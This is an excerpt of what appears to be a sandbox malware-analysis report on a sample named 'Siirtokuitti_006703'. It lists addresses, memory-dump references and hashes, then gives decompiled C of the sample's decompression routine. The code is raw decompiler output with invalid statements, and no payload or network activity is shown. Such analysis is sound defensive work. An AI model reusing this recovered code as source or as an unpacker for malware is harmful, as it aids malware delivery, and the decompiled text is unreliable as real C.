                                                                                                                      0x00406f9f
                                                                                                                      0x00406fa2
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fab
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f38
                                                                                                                      0x00406f3b
                                                                                                                      0x00406f3d
                                                                                                                      0x00406f40
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c9f
                                                                                                                      0x00406c9f
                                                                                                                      0x00406ca3
                                                                                                                      0x004072e8
                                                                                                                      0x00000000
                                                                                                                      0x004072e8
                                                                                                                      0x00406ca9
                                                                                                                      0x00406cac
                                                                                                                      0x00406caf
                                                                                                                      0x00406cb2
                                                                                                                      0x00406cb5
                                                                                                                      0x00406cb8
                                                                                                                      0x00406cbb
                                                                                                                      0x00406cbd
                                                                                                                      0x00406cc0
                                                                                                                      0x00406cc3
                                                                                                                      0x00406cc6
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2e
                                                                                                                      0x004072f4
                                                                                                                      0x00000000
                                                                                                                      0x004072f4
                                                                                                                      0x00406e34
                                                                                                                      0x00406e37
                                                                                                                      0x00406e3a
                                                                                                                      0x00406e3d
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e42
                                                                                                                      0x00406e45
                                                                                                                      0x00406e48
                                                                                                                      0x00406e4b
                                                                                                                      0x00406e4e
                                                                                                                      0x00406e51
                                                                                                                      0x00406e52
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e57
                                                                                                                      0x00406e5a
                                                                                                                      0x00406e5d
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e63
                                                                                                                      0x00406e65
                                                                                                                      0x00406e65
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070b1
                                                                                                                      0x004070b4
                                                                                                                      0x004070b7
                                                                                                                      0x004070ba
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bf
                                                                                                                      0x004070c2
                                                                                                                      0x004070c5
                                                                                                                      0x004070c8
                                                                                                                      0x004070cb
                                                                                                                      0x004070ce
                                                                                                                      0x004070cf
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d4
                                                                                                                      0x004070d7
                                                                                                                      0x004070da
                                                                                                                      0x004070dd
                                                                                                                      0x004070e0
                                                                                                                      0x004070e4
                                                                                                                      0x004070e6
                                                                                                                      0x004070e9
                                                                                                                      0x00000000
                                                                                                                      0x004070eb
                                                                                                                      0x00406e68
                                                                                                                      0x00406e68
                                                                                                                      0x00000000
                                                                                                                      0x00406e68
                                                                                                                      0x004070e9
                                                                                                                      0x0040731e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040694d
                                                                                                                      0x00407355
                                                                                                                      0x00407355
                                                                                                                      0x00000000
                                                                                                                      0x00407355
                                                                                                                      0x004071a2
                                                                                                                      0x00407129
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00406d5d

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                                                                      • Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
                                                                                                                      • Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                                                                      • Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E00406E77() {
                                                                                                                      				unsigned short _t531;
                                                                                                                      				signed int _t532;
                                                                                                                      				void _t533;
                                                                                                                      				signed int _t534;
                                                                                                                      				signed int _t535;
                                                                                                                      				signed int _t565;
                                                                                                                      				signed int _t568;
                                                                                                                      				signed int _t589;
                                                                                                                      				signed int* _t606;
                                                                                                                      				void* _t613;
                                                                                                                      
                                                                                                                      				L0:
                                                                                                                      				while(1) {
                                                                                                                      					L0:
                                                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                                                      						 *(_t613 - 0x84) = 0xb;
                                                                                                                      						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                                                      						goto L132;
                                                                                                                      					} else {
                                                                                                                      						__eax =  *(__ebp - 0x28);
                                                                                                                      						L88:
                                                                                                                      						 *(__ebp - 0x2c) = __eax;
                                                                                                                      						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      						L89:
                                                                                                                      						__eax =  *(__ebp - 4);
                                                                                                                      						 *(__ebp - 0x80) = 0x15;
                                                                                                                      						__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                      						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                      						L69:
                                                                                                                      						 *(__ebp - 0x84) = 0x12;
                                                                                                                      						while(1) {
                                                                                                                      							L132:
                                                                                                                      							 *(_t613 - 0x54) = _t606;
                                                                                                                      							while(1) {
                                                                                                                      								L133:
                                                                                                                      								_t531 =  *_t606;
                                                                                                                      								_t589 = _t531 & 0x0000ffff;
                                                                                                                      								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                      								if( *(_t613 - 0xc) >= _t565) {
                                                                                                                      									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                      									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                      									 *(_t613 - 0x40) = 1;
                                                                                                                      									_t532 = _t531 - (_t531 >> 5);
                                                                                                                      									 *_t606 = _t532;
                                                                                                                      								} else {
                                                                                                                      									 *(_t613 - 0x10) = _t565;
                                                                                                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                      									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                      								}
                                                                                                                      								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                      									goto L139;
                                                                                                                      								}
                                                                                                                      								L137:
                                                                                                                      								if( *(_t613 - 0x6c) == 0) {
                                                                                                                      									 *(_t613 - 0x88) = 5;
                                                                                                                      									L170:
                                                                                                                      									_t568 = 0x22;
                                                                                                                      									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                      									_t535 = 0;
                                                                                                                      									L172:
                                                                                                                      									return _t535;
                                                                                                                      								}
                                                                                                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                      								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                      								L139:
                                                                                                                      								_t533 =  *(_t613 - 0x84);
                                                                                                                      								while(1) {
                                                                                                                      									 *(_t613 - 0x88) = _t533;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										_t534 =  *(_t613 - 0x88);
                                                                                                                      										if(_t534 > 0x1c) {
                                                                                                                      											break;
                                                                                                                      										}
                                                                                                                      										switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
                                                                                                                      											case 0:
                                                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      												_t534 =  *( *(_t613 - 0x70));
                                                                                                                      												if(_t534 > 0xe1) {
                                                                                                                      													goto L171;
                                                                                                                      												}
                                                                                                                      												_t538 = _t534 & 0x000000ff;
                                                                                                                      												_push(0x2d);
                                                                                                                      												asm("cdq");
                                                                                                                      												_pop(_t570);
                                                                                                                      												_push(9);
                                                                                                                      												_pop(_t571);
                                                                                                                      												_t609 = _t538 / _t570;
                                                                                                                      												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                      												asm("cdq");
                                                                                                                      												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                      												 *(_t613 - 0x3c) = _t604;
                                                                                                                      												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                      												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                      												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                      												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                      													L10:
                                                                                                                      													if(_t612 == 0) {
                                                                                                                      														L12:
                                                                                                                      														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                      														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                      														goto L15;
                                                                                                                      													} else {
                                                                                                                      														goto L11;
                                                                                                                      													}
                                                                                                                      													do {
                                                                                                                      														L11:
                                                                                                                      														_t612 = _t612 - 1;
                                                                                                                      														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                      													} while (_t612 != 0);
                                                                                                                      													goto L12;
                                                                                                                      												}
                                                                                                                      												if( *(_t613 - 4) != 0) {
                                                                                                                      													GlobalFree( *(_t613 - 4));
                                                                                                                      												}
                                                                                                                      												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                      												 *(_t613 - 4) = _t534;
                                                                                                                      												if(_t534 == 0) {
                                                                                                                      													goto L171;
                                                                                                                      												} else {
                                                                                                                      													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                      													goto L10;
                                                                                                                      												}
                                                                                                                      											case 1:
                                                                                                                      												L13:
                                                                                                                      												__eflags =  *(_t613 - 0x6c);
                                                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                                                      													 *(_t613 - 0x88) = 1;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      												_t45 = _t613 - 0x48;
                                                                                                                      												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                      												__eflags =  *_t45;
                                                                                                                      												L15:
                                                                                                                      												if( *(_t613 - 0x48) < 4) {
                                                                                                                      													goto L13;
                                                                                                                      												}
                                                                                                                      												_t546 =  *(_t613 - 0x40);
                                                                                                                      												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                      													L20:
                                                                                                                      													 *(_t613 - 0x48) = 5;
                                                                                                                      													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                      													goto L23;
                                                                                                                      												}
                                                                                                                      												 *(_t613 - 0x74) = _t546;
                                                                                                                      												if( *(_t613 - 8) != 0) {
                                                                                                                      													GlobalFree( *(_t613 - 8));
                                                                                                                      												}
                                                                                                                      												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                      												 *(_t613 - 8) = _t534;
                                                                                                                      												if(_t534 == 0) {
                                                                                                                      													goto L171;
                                                                                                                      												} else {
                                                                                                                      													goto L20;
                                                                                                                      												}
                                                                                                                      											case 2:
                                                                                                                      												L24:
                                                                                                                      												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                      												 *(_t613 - 0x84) = 6;
                                                                                                                      												 *(_t613 - 0x4c) = _t553;
                                                                                                                      												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                      												L132:
                                                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                                                      												goto L133;
                                                                                                                      											case 3:
                                                                                                                      												L21:
                                                                                                                      												__eflags =  *(_t613 - 0x6c);
                                                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                                                      													 *(_t613 - 0x88) = 3;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      												_t67 = _t613 - 0x70;
                                                                                                                      												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      												__eflags =  *_t67;
                                                                                                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                      												L23:
                                                                                                                      												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                      												if( *(_t613 - 0x48) != 0) {
                                                                                                                      													goto L21;
                                                                                                                      												}
                                                                                                                      												goto L24;
                                                                                                                      											case 4:
                                                                                                                      												L133:
                                                                                                                      												_t531 =  *_t606;
                                                                                                                      												_t589 = _t531 & 0x0000ffff;
                                                                                                                      												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                      												if( *(_t613 - 0xc) >= _t565) {
                                                                                                                      													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                      													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                      													 *(_t613 - 0x40) = 1;
                                                                                                                      													_t532 = _t531 - (_t531 >> 5);
                                                                                                                      													 *_t606 = _t532;
                                                                                                                      												} else {
                                                                                                                      													 *(_t613 - 0x10) = _t565;
                                                                                                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                      													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                      												}
                                                                                                                      												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                      													goto L139;
                                                                                                                      												}
                                                                                                                      											case 5:
                                                                                                                      												goto L137;
                                                                                                                      											case 6:
                                                                                                                      												__edx = 0;
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                                                      													 *(__ebp - 0x34) = 1;
                                                                                                                      													 *(__ebp - 0x84) = 7;
                                                                                                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                      													while(1) {
                                                                                                                      														L132:
                                                                                                                      														 *(_t613 - 0x54) = _t606;
                                                                                                                      														goto L133;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                      												__esi =  *(__ebp - 0x60);
                                                                                                                      												__cl = 8;
                                                                                                                      												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                      												__ecx =  *(__ebp - 0x3c);
                                                                                                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      												if( *(__ebp - 0x38) >= 4) {
                                                                                                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                      													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                      														_t98 = __ebp - 0x38;
                                                                                                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                      														__eflags =  *_t98;
                                                                                                                      													} else {
                                                                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x38) = 0;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                      												if( *(__ebp - 0x34) == __edx) {
                                                                                                                      													__ebx = 0;
                                                                                                                      													__ebx = 1;
                                                                                                                      													goto L61;
                                                                                                                      												} else {
                                                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                      														__eflags = __eax;
                                                                                                                      													}
                                                                                                                      													__ecx =  *(__ebp - 8);
                                                                                                                      													__ebx = 0;
                                                                                                                      													__ebx = 1;
                                                                                                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      													goto L41;
                                                                                                                      												}
                                                                                                                      											case 7:
                                                                                                                      												__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                      												if( *(__ebp - 0x40) != 1) {
                                                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                                                      													 *(__ebp - 0x80) = 0x16;
                                                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      													__eax =  *(__ebp - 0x28);
                                                                                                                      													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      													__eax =  *(__ebp - 0x2c);
                                                                                                                      													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      													__eax = 0;
                                                                                                                      													__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      													__al = __al & 0x000000fd;
                                                                                                                      													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                      													__eax =  *(__ebp - 4) + 0x664;
                                                                                                                      													__eflags = __eax;
                                                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                                                      													goto L69;
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                      												 *(__ebp - 0x84) = 8;
                                                                                                                      												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                      												while(1) {
                                                                                                                      													L132:
                                                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                                                      													goto L133;
                                                                                                                      												}
                                                                                                                      											case 8:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                                                      													 *(__ebp - 0x84) = 0xa;
                                                                                                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                      												} else {
                                                                                                                      													__eax =  *(__ebp - 0x38);
                                                                                                                      													__ecx =  *(__ebp - 4);
                                                                                                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                      													 *(__ebp - 0x84) = 9;
                                                                                                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                      												}
                                                                                                                      												while(1) {
                                                                                                                      													L132:
                                                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                                                      													goto L133;
                                                                                                                      												}
                                                                                                                      											case 9:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													goto L89;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x60);
                                                                                                                      												if( *(__ebp - 0x60) == 0) {
                                                                                                                      													goto L171;
                                                                                                                      												}
                                                                                                                      												__eax = 0;
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                      												__eflags = _t259;
                                                                                                                      												0 | _t259 = _t259 + _t259 + 9;
                                                                                                                      												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                      												goto L76;
                                                                                                                      											case 0xa:
                                                                                                                      												goto L0;
                                                                                                                      											case 0xb:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													__ecx =  *(__ebp - 0x24);
                                                                                                                      													__eax =  *(__ebp - 0x20);
                                                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      												} else {
                                                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x28);
                                                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      												goto L88;
                                                                                                                      											case 0xc:
                                                                                                                      												L99:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0xc;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t334 = __ebp - 0x70;
                                                                                                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t334;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                      												goto L101;
                                                                                                                      											case 0xd:
                                                                                                                      												L37:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0xd;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t122 = __ebp - 0x70;
                                                                                                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t122;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												L39:
                                                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                      													goto L48;
                                                                                                                      												}
                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                      													goto L54;
                                                                                                                      												}
                                                                                                                      												L41:
                                                                                                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                      												 *(__ebp - 0x48) = __eax;
                                                                                                                      												__eax = __eax + 1;
                                                                                                                      												__eax = __eax << 8;
                                                                                                                      												__eax = __eax + __ebx;
                                                                                                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      												__ax =  *__esi;
                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                      												__edx = __ax & 0x0000ffff;
                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      													__cx = __ax;
                                                                                                                      													 *(__ebp - 0x40) = 1;
                                                                                                                      													__cx = __ax >> 5;
                                                                                                                      													__eflags = __eax;
                                                                                                                      													__ebx = __ebx + __ebx + 1;
                                                                                                                      													 *__esi = __ax;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                      													0x800 = 0x800 - __edx;
                                                                                                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                      													 *__esi = __cx;
                                                                                                                      												}
